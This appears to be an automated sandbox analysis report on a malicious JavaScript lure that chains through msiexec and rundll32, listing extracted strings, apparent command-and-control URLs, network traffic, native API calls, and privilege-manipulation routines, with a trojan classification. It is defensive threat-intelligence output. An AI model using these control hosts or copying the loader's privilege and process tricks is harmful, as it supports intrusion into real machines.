Source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe	String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/Q
Source: wscript.exe, 00000000.00000003.2040677735.00000207B542C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/T
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2040569360.00000207B544C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp, C5C8CC0A7FE31816B4641D04654025600.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: wscript.exe, 00000000.00000003.2040677735.00000207B5427000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com:80/cacert/codesigningrootr45.crtdllI
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://t2.symcb.com0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://tl.symcd.com0&
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com//-cY
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/Ep
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/Qc-
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/)
Source: rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://grizmotras.com/live/ll
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/
Source: rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/W
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9B8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA98F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/7
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/7aB
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336792837.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3125065340.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/D
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/g5
Source: rundll32.exe, 00000007.00000002.3336792837.00000201DA918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/onsG
Source: rundll32.exe, 00000007.00000003.3252614867.00000201DA9E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarinamaers.shop/live/zedv5
Source: rundll32.exe, 00000007.00000003.3308260791.00000201DCA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3308360157.00000201DCA30000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pewwhranet.com/live/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: wscript.exe, 00000000.00000002.2158359070.00000207B5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repo
Source: wscript.exe, 00000000.00000002.2157980050.00000207B4CEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156257066.00000207B4C01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443

Source: unknown	HTTPS traffic detected: 172.67.136.103:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.59.82:443 -> 192.168.2.5:49721 version: TLS 1.2

Drops certificate files (DER)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

Jump to dropped file

System Summary

PE file contains section with special chars

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr	Static PE information: section name: yhDm^

Sample has a suspicious name (potential lure to open the executable)

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Static file information: Suspicious name

Contains functionality to call native functions

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8578C0 NtReadFile,	6_2_00000187EC8578C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857A54 NtWriteFile,	6_2_00000187EC857A54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8579C8 NtClose,	6_2_00000187EC8579C8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857B40 NtFreeVirtualMemory,	6_2_00000187EC857B40
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857588 RtlInitUnicodeString,NtCreateFile,NtClose,	6_2_00000187EC857588
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85378C NtClose,	6_2_00000187EC85378C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC8577B0 RtlInitUnicodeString,NtCreateFile,	6_2_00000187EC8577B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85B0C4 NtOpenKey,RtlpNtOpenKey,	6_2_00000187EC85B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	6_2_00000187EC85B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85AD34 NtAllocateVirtualMemory,	6_2_00000187EC85AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	6_2_00000187EC85463C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857ACC NtClose,	6_2_00000187EC857ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857694 RtlInitUnicodeString,NtDeleteFile,	6_2_00000187EC857694
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC857704 NtQueryInformationFile,	6_2_00000187EC857704
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85745C RtlInitUnicodeString,NtOpenFile,NtClose,	6_2_00000187EC85745C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860A78 NtClose,	6_2_00000187EC860A78
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860A90 NtDeleteFile,	6_2_00000187EC860A90
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC85CB54 NtDelayExecution,	6_2_00000187EC85CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860AC0 NtFreeVirtualMemory,	6_2_00000187EC860AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC860AF0 NtWriteFile,	6_2_00000187EC860AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEB0C4 NtOpenKey,RtlpNtOpenKey,	7_2_00000201DAAEB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7A54 NtWriteFile,	7_2_00000201DAAE7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	7_2_00000201DAAE463C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE378C NtClose,	7_2_00000201DAAE378C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	7_2_00000201DAAEB1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE77B0 RtlInitUnicodeString,NtCreateFile,	7_2_00000201DAAE77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAECB54 NtDelayExecution,	7_2_00000201DAAECB54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7B40 NtFreeVirtualMemory,	7_2_00000201DAAE7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAEAD34 NtAllocateVirtualMemory,	7_2_00000201DAAEAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0A90 NtDeleteFile,	7_2_00000201DAAF0A90
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7694 RtlInitUnicodeString,NtDeleteFile,	7_2_00000201DAAE7694
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0A78 NtClose,	7_2_00000201DAAF0A78
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7ACC NtClose,	7_2_00000201DAAE7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAF0AC0 NtFreeVirtualMemory,	7_2_00000201DAAF0AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE78C0 NtReadFile,	7_2_00000201DAAE78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE745C RtlInitUnicodeString,NtOpenFile,NtClose,	7_2_00000201DAAE745C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7588 RtlInitUnicodeString,NtCreateFile,NtClose,	7_2_00000201DAAE7588
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE79C8 NtClose,	7_2_00000201DAAE79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE7704 NtQueryInformationFile,	7_2_00000201DAAE7704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950AD34 NtAllocateVirtualMemory,	8_2_000001A37950AD34
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507B40 NtFreeVirtualMemory,	8_2_000001A379507B40
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507694 RtlInitUnicodeString,NtDeleteFile,	8_2_000001A379507694
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379510AC0 NtFreeVirtualMemory,	8_2_000001A379510AC0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795078C0 NtReadFile,	8_2_000001A3795078C0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507A54 NtWriteFile,	8_2_000001A379507A54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950745C RtlInitUnicodeString,NtOpenFile,NtClose,	8_2_000001A37950745C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507704 NtQueryInformationFile,	8_2_000001A379507704
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950B0C4 NtOpenKey,	8_2_000001A37950B0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507ACC NtClose,	8_2_000001A379507ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379507588 RtlInitUnicodeString,NtCreateFile,NtClose,	8_2_000001A379507588
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950378C NtClose,	8_2_000001A37950378C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795077B0 RtlInitUnicodeString,NtCreateFile,	8_2_000001A3795077B0
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950CB54 NtDelayExecution,	8_2_000001A37950CB54
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,	8_2_000001A37950463C
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A37950B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	8_2_000001A37950B1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A3795079C8 NtClose,	8_2_000001A3795079C8

Contains functionality to communicate with device drivers

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_000000018006A2C8: DeviceIoControl,

6_2_000000018006A2C8

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\rundll32.exe

6_2_000000018004B1A4

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIAA9D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AEC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI39EE.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006F6A50	4_2_006F6A50
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072F032	4_2_0072F032
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071E270	4_2_0071E270
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071C2CA	4_2_0071C2CA
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007292A9	4_2_007292A9
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_007284BD	4_2_007284BD
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071A587	4_2_0071A587
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006FC870	4_2_006FC870
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0072D8D5	4_2_0072D8D5
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00714920	4_2_00714920
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071A915	4_2_0071A915
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00720A48	4_2_00720A48
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_006F9CC0	4_2_006F9CC0
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_00725D6D	4_2_00725D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180017FE8	6_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006DFF4	6_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800220D8	6_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007C140	6_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060174	6_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018008023C	6_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018000834C	6_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006C470	6_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800784E0	6_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800764F0	6_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180060578	6_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010580	6_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004E5DC	6_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062600	6_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180002610	6_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180004638	6_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004A650	6_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E760	6_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800647B0	6_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007E7C7	6_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180076930	6_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180062954	6_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006A994	6_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006E9FC	6_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180082A18	6_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180072A27	6_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010B58	6_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180026C84	6_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001ECF4	6_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180008E20	6_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180052FD8	6_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018003AFE8	6_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005D014	6_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006F0B4	6_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800630CC	6_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005912C	6_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278	6_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007B2D0	6_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002B2EC	6_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018006D3D4	6_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800033E0	6_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180075480	6_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800694A0	6_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005958C	6_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800576DC	6_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800097E0	6_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000001800277FC	6_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018002D964	6_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073B60	6_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018007BBB0	6_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001BC38	6_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005DD18	6_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180073DF0	6_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180011DF0	6_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018005BE6C	6_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004FF88	6_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_00000187EC851030	6_2_00000187EC851030
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_00000201DAAE1030	7_2_00000201DAAE1030
Source: C:\Windows\System32\rundll32.exe	Code function: 8_2_000001A379501030	8_2_000001A379501030

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 000000018000CF30 appears 33 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 0000000180005348 appears 71 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 0071325F appears 103 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 00713790 appears 39 times
Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: String function: 00713292 appears 70 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: Document_a19_79b555791-28h97348k5477-3219g9.js

Initial sample: Strings found which are bigger than 50

Source: classification engine

Classification label: mal100.spre.troj.evad.winJS@40/28@2/3

Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049050 GetCurrentProcessId,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,SetLastError,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,OpenProcess,	6_2_0000000180049050
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,	6_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180049278 LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,LookupPrivilegeValueW,??_U@YAPEAX_K@Z,GetCurrentProcess,OpenProcessToken,CreateRestrictedToken,CloseHandle,CloseHandle,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,AdjustTokenPrivileges,??_V@YAXPEAX@Z,	6_2_0000000180049278
